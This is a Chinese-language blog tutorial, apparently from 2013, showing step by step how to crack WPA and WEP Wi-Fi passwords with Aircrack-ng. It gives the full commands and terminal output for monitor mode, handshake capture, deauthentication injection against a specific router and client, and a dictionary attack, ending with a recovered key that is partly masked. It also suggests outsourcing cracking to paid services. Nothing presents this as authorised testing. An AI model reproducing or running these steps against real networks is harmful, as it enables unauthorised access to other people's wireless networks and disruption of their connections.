雖然無線破解現在有GUI版的,很少人使用aircrack這種指令行下的無線破解工具,不過我還是覺得指令行版的比GUI操作更自由~
就教下簡單的WPA破解,WEP現在很少人使用了,估計沒啥作用。不過等等還是在最後說下WEP的指令吧。
先介紹下Aircrack-ng套裝常用的幾個工具
airmon-ng:檢查wifi端口狀态和進入監控模式到工具
airodump-ng:掃描網絡并抓包的工具,跟aireplay-ng配合使用
aireplay-ng:資料包注入工具
aircrack-ng:資料包破解工具
0x01 ifconfig wlan0 up #激活無線網卡
0x02 airmoin-ng start wlan0 up #将無線網卡設定為Monitor模式
0x03 airodump-ng -w 儲存資料包路徑加檔案名 -c 頻道 mon0 #開始抓包,可以加個--ivs參數來設定隻抓ivs的資料
在這裡解釋一下,一般我們破解密碼隻需要ivs資料包,如果不加ivs參數,它會預設儲存為cap檔案,cap檔案包含了各種資料,會導緻檔案過大,有時候cap檔案會大到幾百M,如果你不是想分析裡面的資料,單單要破解密碼,推薦儲存為ivs。
0x04 開啟另一個bash視窗,輸入aireplay-ng -0 10 -a AP的Mac -c 用戶端的Mac mon0 #進行Deauth注入擷取WPA的握手包
0x05 aircrack-ng -w 字典路徑 ivs/cap檔案路徑 #開始字典跑包破解密碼,當然你也可以拿到淘寶上面找人代跑、它們有強大到字典跟顯示卡(GPU破解)這樣可以讓我們的破解速度跟成功率大大提高
----------------------思路交代完畢、下面是實戰----------------------
[email protected]:~# ifconfig wlan0 up
[email protected]:~# airmon-ng start wlan0 up
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]/usr/local/sbin/airmon-ng: line 631: [: up: integer expression expected
(monitor mode enabled on mon0)
---------------------
CH 7 ][ Elapsed: 52 s ][ 2013-04-22 19:02
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:10:77:1F:DA:44 -44 90 500 60 0 7 11e WPA2 CCMP PSK Netcore_2_4G
0E:34:CB:00:97:A2 -71 0 4 0 0 6 54e. WPA2 TKIP MGT <length: 0>
C8:3A:35:3B:D1:00 -73 57 317 136 9 7 11e WPA CCMP PSK Tenda_3BD100
00:25:86:32:82:0A -74 0 6 0 0 6 54 . WPA2 CCMP PSK liaojie
78:44:76:01:3C:26 -76 78 476 0 0 7 54 WPA2 CCMP PSK ipTIME
00:34:CB:00:82:C5 -76 0 13 0 0 6 54e. WPA2 TKIP PSK <length: 0>
0E:34:CB:00:8B:18 -79 8 4 0 0 6 54e. WPA2 TKIP MGT <length: 0>
06:34:CB:00:8B:18 -79 0 7 0 0 6 54e. OPN CMCC
00:34:CB:00:8B:18 -79 0 2 0 0 6 54e. WPA2 TKIP PSK <length: 0>
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 00:90:A2:BC:DB:A6 -56 0 - 1 0 22
(not associated) 00:21:6B:5C:66:7A -78 0 - 1 0 1
(not associated) 0C:37:DC:9B:2B:7C -80 0 - 1 0 2
C8:3A:35:3B:D1:00 08:10:77:1F:DA:44 -44 11e-11e 0 77
[2]+ Stopped airodump-ng -w /home/test -c 7 --ivs mon0
[email protected]:~#
BSSID是AP的Mac,STATION是用戶端到Mac,隻有用戶端連接配接AP的時候才能實施抓包破解。(好像是這樣...大牛如果有其他到方法請說下)
在沒有注入攻擊之前,Frames跟#Data的資料量很少,這時候我們就要利用用戶端進行攻擊了
[email protected]:~# aireplay-ng -0 10 -a C8:3A:35:3B:D1:00 -c 08:10:77:1F:DA:44 mon0
19:05:04 Waiting for beacon frame (BSSID: C8:3A:35:3B:D1:00) on channel 7
19:05:05 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [23|52 ACKs]
19:05:06 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [32|52 ACKs]
19:05:06 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [34|49 ACKs]
19:05:07 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [27|46 ACKs]
19:05:07 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [28|55 ACKs]
19:05:08 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [32|49 ACKs]
19:05:08 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [33|48 ACKs]
19:05:09 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [36|52 ACKs]
19:05:10 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [40|59 ACKs]
19:05:10 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [53|51 ACKs]
-0 後面加的是攻擊次數,如果你攻擊10次後沒有出現WPA handshake的話,就繼續攻擊。
我們在另一個視窗輸入攻擊指令後,傳回airodump-ng界面,會發現右上角出現了WPA handshake的提示
CH 7 ][ Elapsed: 4 mins ][ 2013-04-22 19:09 ][ WPA handshake: C8:3A:35:3B:D1:00
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:10:77:1F:DA:44 -43 100 2603 295 0 7 11e WPA2 CCMP PSK Netcore_2_4G
00:34:CB:00:97:A2 -68 0 8 0 0 6 54e. WPA2 TKIP PSK <length: 0>
C8:3A:35:3B:D1:00 -71 100 783 638 0 7 11e WPA CCMP PSK Tenda_3BD100
06:34:CB:00:97:A2 -71 0 7 0 0 6 54e. OPN CMCC
00:25:86:32:82:0A -72 0 24 0 0 6 54 . WPA2 CCMP PSK liaojie
0A:34:CB:00:82:C5 -76 0 16 0 0 6 54e. WPA2 TKIP MGT <length: 0>
78:44:76:01:3C:26 -75 83 2252 0 0 7 54 WPA2 CCMP PSK ipTIME
00:34:CB:00:82:C5 -76 0 47 0 0 6 54e. WPA2 TKIP PSK <length: 0>
06:34:CB:00:8B:18 -78 0 8 0 0 6 54e. OPN CMCC
00:34:CB:00:8B:18 -79 11 6 0 0 6 54e. WPA2 TKIP PSK <length: 0>
0E:34:CB:00:8B:18 -79 0 9 0 0 6 54e. WPA2 TKIP MGT <length: 0>
06:34:CB:00:82:C5 -75 0 14 0 0 6 54e. OPN CMCC
0E:34:CB:00:97:A2 -66 0 14 0 0 6 54e. WPA2 TKIP MGT <length: 0>
8C:21:0A:D1:51:B4 -76 0 1 0 0 6 54e. WPA2 CCMP PSK 1024_D151B4
00:34:CB:00:76:6A -75 0 9 0 0 6 54e. WPA2 TKIP PSK <length: 0>
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 00:90:A2:BC:DB:A6 -56 0 - 1 0 127
(not associated) 0C:37:DC:9B:2B:7C -80 0 - 1 0 12
C8:3A:35:3B:D1:00 E0:A6:70:D7:90:8E -1 11e- 0 0 36
C8:3A:35:3B:D1:00 08:10:77:1F:DA:44 -44 1e-11e 0 1672 Tenda_3BD100
8C:21:0A:D1:51:B4 70:F1:A1:1E:22:55 -80 0 - 1 0 11
[3]+ Stopped airodump-ng -w /home/test -c 7 --ivs mon0
[email protected]:~#
WPA handshake 後面的Mac就是AP的Mac,AP指的是要破解的無線路由
開個視窗檢視下ivs檔案的大小
[email protected]:~# cd /home
[email protected]:/home# ls -al test-01.ivs
-rw-r--r-- 1 root root 6284 2013-04-22 18:55 test-01.ivs
6284位元組,可以破解了(一般隻要不是0位元組,都可以破解),你可以把這個檔案發給淘寶破解,也可以本地破解
[email protected]:~# aircrack-ng -w /home/crack.txt /home/test-03.ivs
Opening /home/test-03.ivs
Read 33 packets.
# BSSID ESSID Encryption
1 08:10:77:1F:DA:44 Netcore_2_4G Unknown
2 78:44:76:01:3C:26 ipTIME Unknown
3 C8:3A:35:3B:D1:00 Tenda_3BD100 WPA (1 handshake)
4 0A:34:CB:00:76:6A CMCC-AUTO Unknown
5 06:34:CB:00:8B:18 CMCC Unknown
6 06:34:CB:00:76:6A CMCC Unknown
7 00:25:86:32:82:0A liaojie Unknown
8 06:34:CB:00:82:C5 CMCC Unknown
9 20:DC:E6:52:52:8E TP-LINK_ooo Unknown
10 06:34:CB:00:97:A2 CMCC Unknown
11 8C:21:0A:D1:51:B4 1024_D151B4 Unknown
Index number of target network ? 3 #你輸入破解指令後,它會讓你選擇你要破解的序号,“Encryption”隻要這個下面有WPA字樣就說明這個序号下的AP已經抓到資料包,可以破解,這裡我選擇3
Opening /home/test-03.ivs
Reading packets, please wait...
這裡說下ivs檔案的檔案名,在aircrack-ng中,如果你輸入“test”這個名字,它會自動給你命名為“test-01.ivs”,如果實施第二次抓包,它會生成名為“test-02.ivs”,以此類推,因為我寫這篇文章的時候測試了三次,是以是test-03.ivs
Aircrack-ng 1.1 r2178
[00:01:27] 72176 keys tested (814.02 k/s)
KEY FOUND! [ 0222XXXX ]
Master Key : D5 8B BC BE 46 3D 43 2D 5F 03 A9 2F 61 95 D6 DD
6C 13 ED 6F F9 A5 15 73 1C BB C2 FC 8E 34 CC DA
Transient Key : E5 55 3D E8 3F 89 4A 72 C2 BD E1 60 C7 CA DB AF
DB 08 A3 C4 C5 FC A9 B4 96 86 2D 46 A6 57 B8 A4
57 F6 09 42 94 E7 A7 FF 79 89 83 AB C2 00 13 26
F7 AA D8 60 B8 5A 0A DC 81 57 53 29 25 FD 17 A0
EAPOL HMAC : AE 6F C0 44 A3 E7 E4 32 DA 83 71 DF 48 26 32 05
[email protected]:~#
破解結果,Key是0222XXXX
------------------------------------下面是WEP的破解大概過程----------------------------------------
0x01 ifconfig wlan0 up #激活無線網卡
0x02 airmon-ng start wlan0 up #将無線網卡設定為Monitor模式
0x03 airodump-ng -w 儲存資料包路徑 -c 頻道 --ivs mon0 #開始抓包
0x04 aireplay-ng -3 -b AP的Mac -h 用戶端的Mac mon0 #用ArpRequest 注入攻擊
0x05 aircrack-ng ivs/cap的路徑 #破解WEP,WEP不需要字典,一般資料夠多的話,幾分鐘就能破解出來了
------------------------------------------------------------------------------------------------
![網絡空間安全中高職業院校職技能大賽——Telnet弱密碼滲透測試[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)